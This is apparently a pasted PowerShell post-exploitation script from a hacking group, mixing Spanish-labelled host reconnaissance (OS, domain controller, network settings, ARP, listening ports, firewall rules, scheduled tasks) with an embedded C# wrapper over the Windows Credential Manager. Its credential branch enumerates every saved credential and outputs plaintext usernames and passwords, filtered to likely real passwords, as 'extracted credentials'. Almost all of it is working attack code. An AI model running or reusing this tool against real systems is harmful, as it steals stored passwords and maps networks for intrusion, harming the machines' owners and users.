· 6 years ago · Sep 03, 2019, 04:16 PM
1
2$banner = @"
3 .-----. .'``-.
4 / ,-- | .- ``-.
5 ,' ,-' ``. _.-' ,-.``.)
6 ; / ,=---``--+' .- -. ``.
7( \ ,' =,- ,' ( o ) | /\
8 : : / =,-' / \-' ;(o :
9 \ | ' ; ( ``--' \ ;
10 \ | = | \``--+ --. ``(
11 ``+ =/ : : ``. ``. \
12 ' =/ \ ``--. '-. ``. ``.
13 \ =; ``._ : ( ``-. ``. ``.
14 \ = ; ``._.' ``-.-``-._\ ``-.
15 \= ' _.-'_) (::::)
16 ``+ -. ``--7' ``--``..'
17 ( : .' ;
18 \ | | /
19 \ | _.-| +---'
20 ``--+ ``. \ \
21 /``. '-.-\ ``--.
22 / /#### ``----.'
23 ( ,-'############\
24 \\/###############;
25 \###############/
26 l1c0rd3b3ll0t4 |--------------| _.---------
27 :::::::::::::::|_.-''
28 ::::::::::_.-''
29 .-''..'---'-------'' CyberVaca@HackPlayers
30"@
31
32
33
34function Get-Info {
35
36$sistema_operativo = (Get-ItemProperty "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion").ProductName + " Build " + (Get-ItemProperty "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion").CurrentBuild
37$modelo_equipo = (Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\BIOS").SystemProductName
38$controlador_de_dominio = "$env:LOGONSERVER".replace("\\","")
39$nombre_maquina = $env:COMPUTERNAME
40$num_procesadores = ((Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\*").Identifier).count
41$procesador = (Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0").ProcessorNameString
42$dominio = $env:USERDNSDOMAIN
43$network = Get-ItemProperty "registry::HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\*" | Select-Object IPAddress, SubnetMask, DefaultGateway,NameServer
44
45$PC = New-Object psobject -Property @{
46"Nombre" = $env:COMPUTERNAME
47"Sistema Operativo" = $sistema_operativo
48"Procesador" = $procesador
49"Modelo" = $modelo_equipo
50"Dominio" = $Dominio
51"Num. Procesadores" = $num_procesadores
52"Direccion IP" = $network.ipaddress[0]
53"Mascara de SubRed" = $network.SubnetMask[0]
54"Puerta de Enlace" = $network.DefaultGateway[0]
55"Servidores DNS" = $network.nameserver[0].Replace(","," ")
56"MAC" = ((getmac)[3].split(" ")[0]).replace("-",":")
57"RAM" = (((systeminfo | Select-String "memo")[0]) | Out-String).split(":")[1].Replace(" ","").split("MB")[0] + " MB"
58}
59$pc
60}
61function Get-Discosduros {Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root}
62function Get-ConfigRED {
63
64Start-Job -ScriptBlock {
65Write-Host "`n[+] ==================================== Tabla ARP ===========================================`n"
66arp -A
67Write-Host "`n[+] ==================================== Conexiones Activas ===========================================`n"
68
69$listening = netstat -ano | Select-String "LISTENING"| Out-String; $listening } | Wait-Job | Receive-Job
70
71
72}
73function credman {
74Param
75(
76 [Parameter(Mandatory=$false)][Switch] $AddCred,
77 [Parameter(Mandatory=$false)][Switch] $DelCred,
78 [Parameter(Mandatory=$false)][Switch] $GetCred,
79 [Parameter(Mandatory=$false)][Switch] $ShoCred,
80 [Parameter(Mandatory=$false)][Switch] $RunTests,
81 [Parameter(Mandatory=$false)][ValidateLength(1,32767) <# CRED_MAX_GENERIC_TARGET_NAME_LENGTH #>][String] $Target,
82 [Parameter(Mandatory=$false)][ValidateLength(1,512) <# CRED_MAX_USERNAME_LENGTH #>][String] $User,
83 [Parameter(Mandatory=$false)][ValidateLength(1,512) <# CRED_MAX_CREDENTIAL_BLOB_SIZE #>][String] $Pass,
84 [Parameter(Mandatory=$false)][ValidateLength(1,256) <# CRED_MAX_STRING_LENGTH #>][String] $Comment,
85 [Parameter(Mandatory=$false)][Switch] $All,
86 [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
87 "DOMAIN_PASSWORD",
88 "DOMAIN_CERTIFICATE",
89 "DOMAIN_VISIBLE_PASSWORD",
90 "GENERIC_CERTIFICATE",
91 "DOMAIN_EXTENDED",
92 "MAXIMUM",
93 "MAXIMUM_EX")][String] $CredType = "GENERIC",
94 [Parameter(Mandatory=$false)][ValidateSet("SESSION",
95 "LOCAL_MACHINE",
96 "ENTERPRISE")][String] $CredPersist = "ENTERPRISE"
97)
98
99#region Pinvoke
100#region Inline C#
101[String] $PsCredmanUtils = @"
102using System;
103using System.Runtime.InteropServices;
104
105namespace PsUtils
106{
107 public class CredMan
108 {
109 #region Imports
110 // DllImport derives from System.Runtime.InteropServices
111 [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredDeleteW", CharSet = CharSet.Unicode)]
112 private static extern bool CredDeleteW([In] string target, [In] CRED_TYPE type, [In] int reservedFlag);
113
114 [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredEnumerateW", CharSet = CharSet.Unicode)]
115 private static extern bool CredEnumerateW([In] string Filter, [In] int Flags, out int Count, out IntPtr CredentialPtr);
116
117 [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredFree")]
118 private static extern void CredFree([In] IntPtr cred);
119
120 [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW", CharSet = CharSet.Unicode)]
121 private static extern bool CredReadW([In] string target, [In] CRED_TYPE type, [In] int reservedFlag, out IntPtr CredentialPtr);
122
123 [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredWriteW", CharSet = CharSet.Unicode)]
124 private static extern bool CredWriteW([In] ref Credential userCredential, [In] UInt32 flags);
125 #endregion
126
127 #region Fields
128 public enum CRED_FLAGS : uint
129 {
130 NONE = 0x0,
131 PROMPT_NOW = 0x2,
132 USERNAME_TARGET = 0x4
133 }
134
135 public enum CRED_ERRORS : uint
136 {
137 ERROR_SUCCESS = 0x0,
138 ERROR_INVALID_PARAMETER = 0x80070057,
139 ERROR_INVALID_FLAGS = 0x800703EC,
140 ERROR_NOT_FOUND = 0x80070490,
141 ERROR_NO_SUCH_LOGON_SESSION = 0x80070520,
142 ERROR_BAD_USERNAME = 0x8007089A
143 }
144
145 public enum CRED_PERSIST : uint
146 {
147 SESSION = 1,
148 LOCAL_MACHINE = 2,
149 ENTERPRISE = 3
150 }
151
152 public enum CRED_TYPE : uint
153 {
154 GENERIC = 1,
155 DOMAIN_PASSWORD = 2,
156 DOMAIN_CERTIFICATE = 3,
157 DOMAIN_VISIBLE_PASSWORD = 4,
158 GENERIC_CERTIFICATE = 5,
159 DOMAIN_EXTENDED = 6,
160 MAXIMUM = 7, // Maximum supported cred type
161 MAXIMUM_EX = (MAXIMUM + 1000), // Allow new applications to run on old OSes
162 }
163
164 [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
165 public struct Credential
166 {
167 public CRED_FLAGS Flags;
168 public CRED_TYPE Type;
169 public string TargetName;
170 public string Comment;
171 public DateTime LastWritten;
172 public UInt32 CredentialBlobSize;
173 public string CredentialBlob;
174 public CRED_PERSIST Persist;
175 public UInt32 AttributeCount;
176 public IntPtr Attributes;
177 public string TargetAlias;
178 public string UserName;
179 }
180
181 [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
182 private struct NativeCredential
183 {
184 public CRED_FLAGS Flags;
185 public CRED_TYPE Type;
186 public IntPtr TargetName;
187 public IntPtr Comment;
188 public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
189 public UInt32 CredentialBlobSize;
190 public IntPtr CredentialBlob;
191 public UInt32 Persist;
192 public UInt32 AttributeCount;
193 public IntPtr Attributes;
194 public IntPtr TargetAlias;
195 public IntPtr UserName;
196 }
197 #endregion
198
199 #region Child Class
200 private class CriticalCredentialHandle : Microsoft.Win32.SafeHandles.CriticalHandleZeroOrMinusOneIsInvalid
201 {
202 public CriticalCredentialHandle(IntPtr preexistingHandle)
203 {
204 SetHandle(preexistingHandle);
205 }
206
207 private Credential XlateNativeCred(IntPtr pCred)
208 {
209 NativeCredential ncred = (NativeCredential)Marshal.PtrToStructure(pCred, typeof(NativeCredential));
210 Credential cred = new Credential();
211 cred.Type = ncred.Type;
212 cred.Flags = ncred.Flags;
213 cred.Persist = (CRED_PERSIST)ncred.Persist;
214
215 long LastWritten = ncred.LastWritten.dwHighDateTime;
216 LastWritten = (LastWritten << 32) + ncred.LastWritten.dwLowDateTime;
217 cred.LastWritten = DateTime.FromFileTime(LastWritten);
218
219 cred.UserName = Marshal.PtrToStringUni(ncred.UserName);
220 cred.TargetName = Marshal.PtrToStringUni(ncred.TargetName);
221 cred.TargetAlias = Marshal.PtrToStringUni(ncred.TargetAlias);
222 cred.Comment = Marshal.PtrToStringUni(ncred.Comment);
223 cred.CredentialBlobSize = ncred.CredentialBlobSize;
224 if (0 < ncred.CredentialBlobSize)
225 {
226 cred.CredentialBlob = Marshal.PtrToStringUni(ncred.CredentialBlob, (int)ncred.CredentialBlobSize / 2);
227 }
228 return cred;
229 }
230
231 public Credential GetCredential()
232 {
233 if (IsInvalid)
234 {
235 throw new InvalidOperationException("Invalid CriticalHandle!");
236 }
237 Credential cred = XlateNativeCred(handle);
238 return cred;
239 }
240
241 public Credential[] GetCredentials(int count)
242 {
243 if (IsInvalid)
244 {
245 throw new InvalidOperationException("Invalid CriticalHandle!");
246 }
247 Credential[] Credentials = new Credential[count];
248 IntPtr pTemp = IntPtr.Zero;
249 for (int inx = 0; inx < count; inx++)
250 {
251 pTemp = Marshal.ReadIntPtr(handle, inx * IntPtr.Size);
252 Credential cred = XlateNativeCred(pTemp);
253 Credentials[inx] = cred;
254 }
255 return Credentials;
256 }
257
258 override protected bool ReleaseHandle()
259 {
260 if (IsInvalid)
261 {
262 return false;
263 }
264 CredFree(handle);
265 SetHandleAsInvalid();
266 return true;
267 }
268 }
269 #endregion
270
271 #region Custom API
272 public static int CredDelete(string target, CRED_TYPE type)
273 {
274 if (!CredDeleteW(target, type, 0))
275 {
276 return Marshal.GetHRForLastWin32Error();
277 }
278 return 0;
279 }
280
281 public static int CredEnum(string Filter, out Credential[] Credentials)
282 {
283 int count = 0;
284 int Flags = 0x0;
285 if (string.IsNullOrEmpty(Filter) ||
286 "*" == Filter)
287 {
288 Filter = null;
289 if (6 <= Environment.OSVersion.Version.Major)
290 {
291 Flags = 0x1; //CRED_ENUMERATE_ALL_CREDENTIALS; only valid is OS >= Vista
292 }
293 }
294 IntPtr pCredentials = IntPtr.Zero;
295 if (!CredEnumerateW(Filter, Flags, out count, out pCredentials))
296 {
297 Credentials = null;
298 return Marshal.GetHRForLastWin32Error();
299 }
300 CriticalCredentialHandle CredHandle = new CriticalCredentialHandle(pCredentials);
301 Credentials = CredHandle.GetCredentials(count);
302 return 0;
303 }
304
305 public static int CredRead(string target, CRED_TYPE type, out Credential Credential)
306 {
307 IntPtr pCredential = IntPtr.Zero;
308 Credential = new Credential();
309 if (!CredReadW(target, type, 0, out pCredential))
310 {
311 return Marshal.GetHRForLastWin32Error();
312 }
313 CriticalCredentialHandle CredHandle = new CriticalCredentialHandle(pCredential);
314 Credential = CredHandle.GetCredential();
315 return 0;
316 }
317
318 public static int CredWrite(Credential userCredential)
319 {
320 if (!CredWriteW(ref userCredential, 0))
321 {
322 return Marshal.GetHRForLastWin32Error();
323 }
324 return 0;
325 }
326
327 #endregion
328
329 private static int AddCred()
330 {
331 Credential Cred = new Credential();
332 string Password = "Password";
333 Cred.Flags = 0;
334 Cred.Type = CRED_TYPE.GENERIC;
335 Cred.TargetName = "Target";
336 Cred.UserName = "UserName";
337 Cred.AttributeCount = 0;
338 Cred.Persist = CRED_PERSIST.ENTERPRISE;
339 Cred.CredentialBlobSize = (uint)Password.Length;
340 Cred.CredentialBlob = Password;
341 Cred.Comment = "Comment";
342 return CredWrite(Cred);
343 }
344
345 private static bool CheckError(string TestName, CRED_ERRORS Rtn)
346 {
347 switch(Rtn)
348 {
349 case CRED_ERRORS.ERROR_SUCCESS:
350 Console.WriteLine(string.Format("'{0}' worked", TestName));
351 return true;
352 case CRED_ERRORS.ERROR_INVALID_FLAGS:
353 case CRED_ERRORS.ERROR_INVALID_PARAMETER:
354 case CRED_ERRORS.ERROR_NO_SUCH_LOGON_SESSION:
355 case CRED_ERRORS.ERROR_NOT_FOUND:
356 case CRED_ERRORS.ERROR_BAD_USERNAME:
357 Console.WriteLine(string.Format("'{0}' failed; {1}.", TestName, Rtn));
358 break;
359 default:
360 Console.WriteLine(string.Format("'{0}' failed; 0x{1}.", TestName, Rtn.ToString("X")));
361 break;
362 }
363 return false;
364 }
365
366 /*
367 * Note: the Main() function is primarily for debugging and testing in a Visual
368 * Studio session. Although it will work from PowerShell, it's not very useful.
369 */
370 public static void Main()
371 {
372 Credential[] Creds = null;
373 Credential Cred = new Credential();
374 int Rtn = 0;
375
376 Console.WriteLine("Testing CredWrite()");
377 Rtn = AddCred();
378 if (!CheckError("CredWrite", (CRED_ERRORS)Rtn))
379 {
380 return;
381 }
382 Console.WriteLine("Testing CredEnum()");
383 Rtn = CredEnum(null, out Creds);
384 if (!CheckError("CredEnum", (CRED_ERRORS)Rtn))
385 {
386 return;
387 }
388 Console.WriteLine("Testing CredRead()");
389 Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
390 if (!CheckError("CredRead", (CRED_ERRORS)Rtn))
391 {
392 return;
393 }
394 Console.WriteLine("Testing CredDelete()");
395 Rtn = CredDelete("Target", CRED_TYPE.GENERIC);
396 if (!CheckError("CredDelete", (CRED_ERRORS)Rtn))
397 {
398 return;
399 }
400 Console.WriteLine("Testing CredRead() again");
401 Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
402 if (!CheckError("CredRead", (CRED_ERRORS)Rtn))
403 {
404 Console.WriteLine("if the error is 'ERROR_NOT_FOUND', this result is OK.");
405 }
406 }
407 }
408}
409"@
410#endregion
411
412$PsCredMan = $null
413try
414{
415 $PsCredMan = [PsUtils.CredMan]
416}
417catch
418{
419 #only remove the error we generate
420 $Error.RemoveAt($Error.Count-1)
421}
422if($null -eq $PsCredMan)
423{
424 Add-Type $PsCredmanUtils
425}
426#endregion
427
428#region Internal Tools
429[HashTable] $ErrorCategory = @{0x80070057 = "InvalidArgument";
430 0x800703EC = "InvalidData";
431 0x80070490 = "ObjectNotFound";
432 0x80070520 = "SecurityError";
433 0x8007089A = "SecurityError"}
434
435function Get-CredType
436{
437 Param
438 (
439 [Parameter(Mandatory=$true)][ValidateSet("GENERIC",
440 "DOMAIN_PASSWORD",
441 "DOMAIN_CERTIFICATE",
442 "DOMAIN_VISIBLE_PASSWORD",
443 "GENERIC_CERTIFICATE",
444 "DOMAIN_EXTENDED",
445 "MAXIMUM",
446 "MAXIMUM_EX")][String] $CredType
447 )
448
449 switch($CredType)
450 {
451 "GENERIC" {return [PsUtils.CredMan+CRED_TYPE]::GENERIC}
452 "DOMAIN_PASSWORD" {return [PsUtils.CredMan+CRED_TYPE]::DOMAIN_PASSWORD}
453 "DOMAIN_CERTIFICATE" {return [PsUtils.CredMan+CRED_TYPE]::DOMAIN_CERTIFICATE}
454 "DOMAIN_VISIBLE_PASSWORD" {return [PsUtils.CredMan+CRED_TYPE]::DOMAIN_VISIBLE_PASSWORD}
455 "GENERIC_CERTIFICATE" {return [PsUtils.CredMan+CRED_TYPE]::GENERIC_CERTIFICATE}
456 "DOMAIN_EXTENDED" {return [PsUtils.CredMan+CRED_TYPE]::DOMAIN_EXTENDED}
457 "MAXIMUM" {return [PsUtils.CredMan+CRED_TYPE]::MAXIMUM}
458 "MAXIMUM_EX" {return [PsUtils.CredMan+CRED_TYPE]::MAXIMUM_EX}
459 }
460}
461
462function Get-CredPersist
463{
464 Param
465 (
466 [Parameter(Mandatory=$true)][ValidateSet("SESSION",
467 "LOCAL_MACHINE",
468 "ENTERPRISE")][String] $CredPersist
469 )
470
471 switch($CredPersist)
472 {
473 "SESSION" {return [PsUtils.CredMan+CRED_PERSIST]::SESSION}
474 "LOCAL_MACHINE" {return [PsUtils.CredMan+CRED_PERSIST]::LOCAL_MACHINE}
475 "ENTERPRISE" {return [PsUtils.CredMan+CRED_PERSIST]::ENTERPRISE}
476 }
477}
478#endregion
479
480#region Dot-Sourced API
481function Del-Creds
482{
483<#
484.Synopsis
485 Deletes the specified credentials
486
487.Description
488 Calls Win32 CredDeleteW via [PsUtils.CredMan]::CredDelete
489
490.INPUTS
491 See function-level notes
492
493.OUTPUTS
494 0 or non-0 according to action success
495 [Management.Automation.ErrorRecord] if error encountered
496
497.PARAMETER Target
498 Specifies the URI for which the credentials are associated
499
500.PARAMETER CredType
501 Specifies the desired credentials type; defaults to
502 "CRED_TYPE_GENERIC"
503#>
504
505 Param
506 (
507 [Parameter(Mandatory=$true)][ValidateLength(1,32767)][String] $Target,
508 [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
509 "DOMAIN_PASSWORD",
510 "DOMAIN_CERTIFICATE",
511 "DOMAIN_VISIBLE_PASSWORD",
512 "GENERIC_CERTIFICATE",
513 "DOMAIN_EXTENDED",
514 "MAXIMUM",
515 "MAXIMUM_EX")][String] $CredType = "GENERIC"
516 )
517
518 [Int] $Results = 0
519 try
520 {
521 $Results = [PsUtils.CredMan]::CredDelete($Target, $(Get-CredType $CredType))
522 }
523 catch
524 {
525 return $_
526 }
527 if(0 -ne $Results)
528 {
529 [String] $Msg = "Failed to delete credentials store for target '$Target'"
530 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
531 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
532 return $ErrRcd
533 }
534 return $Results
535}
536
537function Enum-Creds
538{
539<#
540.Synopsis
541 Enumerates stored credentials for operating user
542
543.Description
544 Calls Win32 CredEnumerateW via [PsUtils.CredMan]::CredEnum
545
546.INPUTS
547
548
549.OUTPUTS
550 [PsUtils.CredMan+Credential[]] if successful
551 [Management.Automation.ErrorRecord] if unsuccessful or error encountered
552
553.PARAMETER Filter
554 Specifies the filter to be applied to the query
555 Defaults to [String]::Empty
556
557#>
558
559 Param
560 (
561 [Parameter(Mandatory=$false)][AllowEmptyString()][String] $Filter = [String]::Empty
562 )
563
564 [PsUtils.CredMan+Credential[]] $Creds = [Array]::CreateInstance([PsUtils.CredMan+Credential], 0)
565 [Int] $Results = 0
566 try
567 {
568 $Results = [PsUtils.CredMan]::CredEnum($Filter, [Ref]$Creds)
569 }
570 catch
571 {
572 return $_
573 }
574 switch($Results)
575 {
576 0 {break}
577 0x80070490 {break} #ERROR_NOT_FOUND
578 default
579 {
580 [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
581 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
582 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
583 return $ErrRcd
584 }
585 }
586 return $Creds
587}
588
589function Read-Creds
590{
591<#
592.Synopsis
593 Reads specified credentials for operating user
594
595.Description
596 Calls Win32 CredReadW via [PsUtils.CredMan]::CredRead
597
598.INPUTS
599
600.OUTPUTS
601 [PsUtils.CredMan+Credential] if successful
602 [Management.Automation.ErrorRecord] if unsuccessful or error encountered
603
604.PARAMETER Target
605 Specifies the URI for which the credentials are associated
606 If not provided, the username is used as the target
607
608.PARAMETER CredType
609 Specifies the desired credentials type; defaults to
610 "CRED_TYPE_GENERIC"
611#>
612
613 Param
614 (
615 [Parameter(Mandatory=$true)][ValidateLength(1,32767)][String] $Target,
616 [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
617 "DOMAIN_PASSWORD",
618 "DOMAIN_CERTIFICATE",
619 "DOMAIN_VISIBLE_PASSWORD",
620 "GENERIC_CERTIFICATE",
621 "DOMAIN_EXTENDED",
622 "MAXIMUM",
623 "MAXIMUM_EX")][String] $CredType = "GENERIC"
624 )
625
626 if("GENERIC" -ne $CredType -and 337 -lt $Target.Length) #CRED_MAX_DOMAIN_TARGET_NAME_LENGTH
627 {
628 [String] $Msg = "Target field is longer ($($Target.Length)) than allowed (max 337 characters)"
629 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
630 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, 666, 'LimitsExceeded', $null)
631 return $ErrRcd
632 }
633 [PsUtils.CredMan+Credential] $Cred = New-Object PsUtils.CredMan+Credential
634 [Int] $Results = 0
635 try
636 {
637 $Results = [PsUtils.CredMan]::CredRead($Target, $(Get-CredType $CredType), [Ref]$Cred)
638 }
639 catch
640 {
641 return $_
642 }
643
644 switch($Results)
645 {
646 0 {break}
647 0x80070490 {return $null} #ERROR_NOT_FOUND
648 default
649 {
650 [String] $Msg = "Error reading credentials for target '$Target' from '$Env:UserName' credentials store"
651 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
652 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
653 return $ErrRcd
654 }
655 }
656 return $Cred
657}
658
659function Write-Creds
660{
661<#
662.Synopsis
663 Saves or updates specified credentials for operating user
664
665.Description
666 Calls Win32 CredWriteW via [PsUtils.CredMan]::CredWrite
667
668.INPUTS
669
670.OUTPUTS
671 [Boolean] true if successful
672 [Management.Automation.ErrorRecord] if unsuccessful or error encountered
673
674.PARAMETER Target
675 Specifies the URI for which the credentials are associated
676 If not provided, the username is used as the target
677
678.PARAMETER UserName
679 Specifies the name of credential to be read
680
681.PARAMETER Password
682 Specifies the password of credential to be read
683
684.PARAMETER Comment
685 Allows the caller to specify the comment associated with
686 these credentials
687
688.PARAMETER CredType
689 Specifies the desired credentials type; defaults to
690 "CRED_TYPE_GENERIC"
691
692.PARAMETER CredPersist
693 Specifies the desired credentials storage type;
694 defaults to "CRED_PERSIST_ENTERPRISE"
695#>
696
697 Param
698 (
699 [Parameter(Mandatory=$false)][ValidateLength(0,32676)][String] $Target,
700 [Parameter(Mandatory=$true)][ValidateLength(1,512)][String] $UserName,
701 [Parameter(Mandatory=$true)][ValidateLength(1,512)][String] $Password,
702 [Parameter(Mandatory=$false)][ValidateLength(0,256)][String] $Comment = [String]::Empty,
703 [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
704 "DOMAIN_PASSWORD",
705 "DOMAIN_CERTIFICATE",
706 "DOMAIN_VISIBLE_PASSWORD",
707 "GENERIC_CERTIFICATE",
708 "DOMAIN_EXTENDED",
709 "MAXIMUM",
710 "MAXIMUM_EX")][String] $CredType = "GENERIC",
711 [Parameter(Mandatory=$false)][ValidateSet("SESSION",
712 "LOCAL_MACHINE",
713 "ENTERPRISE")][String] $CredPersist = "ENTERPRISE"
714 )
715
716 if([String]::IsNullOrEmpty($Target))
717 {
718 $Target = $UserName
719 }
720 if("GENERIC" -ne $CredType -and 337 -lt $Target.Length) #CRED_MAX_DOMAIN_TARGET_NAME_LENGTH
721 {
722 [String] $Msg = "Target field is longer ($($Target.Length)) than allowed (max 337 characters)"
723 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
724 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, 666, 'LimitsExceeded', $null)
725 return $ErrRcd
726 }
727 if([String]::IsNullOrEmpty($Comment))
728 {
729 $Comment = [String]::Format("Last edited by {0}\{1} on {2}",
730 $Env:UserDomain,
731 $Env:UserName,
732 $Env:ComputerName)
733 }
734 [String] $DomainName = [Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().DomainName
735 [PsUtils.CredMan+Credential] $Cred = New-Object PsUtils.CredMan+Credential
736 switch($Target -eq $UserName -and
737 ("CRED_TYPE_DOMAIN_PASSWORD" -eq $CredType -or
738 "CRED_TYPE_DOMAIN_CERTIFICATE" -eq $CredType))
739 {
740 $true {$Cred.Flags = [PsUtils.CredMan+CRED_FLAGS]::USERNAME_TARGET}
741 $false {$Cred.Flags = [PsUtils.CredMan+CRED_FLAGS]::NONE}
742 }
743 $Cred.Type = Get-CredType $CredType
744 $Cred.TargetName = $Target
745 $Cred.UserName = $UserName
746 $Cred.AttributeCount = 0
747 $Cred.Persist = Get-CredPersist $CredPersist
748 $Cred.CredentialBlobSize = [Text.Encoding]::Unicode.GetBytes($Password).Length
749 $Cred.CredentialBlob = $Password
750 $Cred.Comment = $Comment
751
752 [Int] $Results = 0
753 try
754 {
755 $Results = [PsUtils.CredMan]::CredWrite($Cred)
756 }
757 catch
758 {
759 return $_
760 }
761
762 if(0 -ne $Results)
763 {
764 [String] $Msg = "Failed to write to credentials store for target '$Target' using '$UserName', '$Password', '$Comment'"
765 [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
766 [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
767 return $ErrRcd
768 }
769 return $Results
770}
771
772#endregion
773
774#region Cmd-Line functionality
775function CredManMain
776{
777#region Adding credentials
778 if($AddCred)
779 {
780 if([String]::IsNullOrEmpty($User) -or
781 [String]::IsNullOrEmpty($Pass))
782 {
783 Write-Host "You must supply a user name and password (target URI is optional)."
784 return
785 }
786 # may be [Int32] or [Management.Automation.ErrorRecord]
787 [Object] $Results = Write-Creds $Target $User $Pass $Comment $CredType $CredPersist
788 if(0 -eq $Results)
789 {
790 [Object] $Cred = Read-Creds $Target $CredType
791 if($null -eq $Cred)
792 {
793 Write-Host "Credentials for '$Target', '$User' was not found."
794 return
795 }
796 if($Cred -is [Management.Automation.ErrorRecord])
797 {
798 return $Cred
799 }
800 [String] $CredStr = @"
801Successfully wrote or updated credentials as:
802 UserName : $($Cred.UserName)
803 Password : $($Cred.CredentialBlob)
804 Target : $($Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1))
805 Updated : $([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime())) UTC
806 Comment : $($Cred.Comment)
807"@
808 Write-Host $CredStr
809
810 return
811 }
812 # will be a [Management.Automation.ErrorRecord]
813 return $Results
814 }
815#endregion
816
817#region Removing credentials
818 if($DelCred)
819 {
820 if(-not $Target)
821 {
822 Write-Host "You must supply a target URI."
823 return
824 }
825 # may be [Int32] or [Management.Automation.ErrorRecord]
826 [Object] $Results = Del-Creds $Target $CredType
827 if(0 -eq $Results)
828 {
829 Write-Host "Successfully deleted credentials for '$Target'"
830 return
831 }
832 # will be a [Management.Automation.ErrorRecord]
833 return $Results
834 }
835#endregion
836
837#region Reading selected credential
838 if($GetCred)
839 {
840 if(-not $Target)
841 {
842 Write-Host "You must supply a target URI."
843 return
844 }
845 # may be [PsUtils.CredMan+Credential] or [Management.Automation.ErrorRecord]
846 [Object] $Cred = Read-Creds $Target $CredType
847 if($null -eq $Cred)
848 {
849 Write-Host "Credential for '$Target' as '$CredType' type was not found."
850 return
851 }
852 if($Cred -is [Management.Automation.ErrorRecord])
853 {
854 return $Cred
855 }
856 [String] $CredStr = @"
857Found credentials as:
858 UserName : $($Cred.UserName)
859 Password : $($Cred.CredentialBlob)
860 Target : $($Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1))
861 Updated : $([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime())) UTC
862 Comment : $($Cred.Comment)
863"@
864 Write-Host $CredStr
865 }
866#endregion
867
868#region Reading all credentials
869 if($ShoCred)
870 {
871 # may be [PsUtils.CredMan+Credential[]] or [Management.Automation.ErrorRecord]
872 [Object] $Creds = Enum-Creds
873 if($Creds -split [Array] -and 0 -eq $Creds.Length)
874 {
875 Write-Host "No Credentials found for $($Env:UserName)"
876 return
877 }
878 if($Creds -is [Management.Automation.ErrorRecord])
879 {
880 return $Creds
881 }
882 foreach($Cred in $Creds)
883 {
884 [String] $CredStr = @"
885
886UserName : $($Cred.UserName)
887Password : $($Cred.CredentialBlob)
888Target : $($Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1))
889Updated : $([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime())) UTC
890Comment : $($Cred.Comment)
891"@
892
893
894 if($All)
895 {
896 $CredStr = @"
897$CredStr
898Alias : $($Cred.TargetAlias)
899AttribCnt : $($Cred.AttributeCount)
900Attribs : $($Cred.Attributes)
901Flags : $($Cred.Flags)
902Pwd Size : $($Cred.CredentialBlobSize)
903Storage : $($Cred.Persist)
904Type : $($Cred.Type)
905"@
906
907
908 }
909
910
911$Credenciales_extraidas = New-Object psobject -Property @{
912"Username" = $Cred.UserName
913"Password" = $Cred.CredentialBlob
914"Target" = $Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1)
915"Updated" = ([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime()))
916"Comment" = $Cred.Comment
917}
918 if (($Credenciales_extraidas.password).length -lt 30 -and ($Credenciales_extraidas.password).length -gt "3") {$Credenciales_extraidas} else {}
919
920 }
921 return
922 }
923#endregion
924
925#region Run basic diagnostics
926 if($RunTests)
927 {
928 [PsUtils.CredMan]::Main()
929 }
930#endregion
931}
932#endregion
933
934CredManMain
935}
936function Get-Config-Firewall {
937Write-Host "`n[+] ================================== Configuracion de Firewall ==================================`n"
938netsh firewall show all
939
940}
941$tareas = schtasks /query /fo LIST /v
